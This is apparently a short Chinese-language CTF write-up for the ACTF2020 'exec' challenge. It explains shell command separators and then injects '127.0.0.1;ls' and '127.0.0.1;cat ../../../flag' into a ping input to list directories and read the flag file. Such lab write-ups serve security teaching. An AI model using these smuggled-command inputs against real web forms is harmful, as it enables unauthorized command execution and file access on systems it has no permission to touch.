ACTF2020 新生赛 exec 1 题解

ctf-管道符

ctf

Publish Date: 2022-01-21

Update Date: 2022-08-29

Word Count: 239

Read Times: 1 Min

Read Count:

前置知识

直接执行|后面的语句。

如果前面的命令错误则执行后面的语句，否则不执行。

无论真假，前后命令均执行。

如果前面的命令正确则执行后面的语句，否则不执行。

linux下的，和&相同。

进入题目，有一个输入框，提示输入要ping的地址。输入127.0.0.1，回显

PING 127.0.0.1 (127.0.0.1): 56 data bytes

尝试闭合单双引号无果后，试用;。输入127.0.0.1;ls，回显

PING 127.0.0.1 (127.0.0.1): 56 data bytes
index.php

执行成功，接下来找flag，最后构造127.0.0.1;ls ../../../

PING 127.0.0.1 (127.0.0.1): 56 data bytes
bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

找到flag，最后输入127.0.0.1;cat ../../../flag
得到flag:flag{ba548127-f0dd-41c2-9f59-d3e0475ad18c}

kingkb

http://kingofkb.github.io/2022/01/21/ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%20exec%201%20%E9%A2%98%E8%A7%A3/

All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source kingkb !

ctf-管道符

文件包含，php伪协议

2022-01-21 ctf

ctf-文件包含 ctf-php伪协议

一句话木马及一些绕过

2022-01-19 ctf

ctf-一句话木马 ctf-<?绕过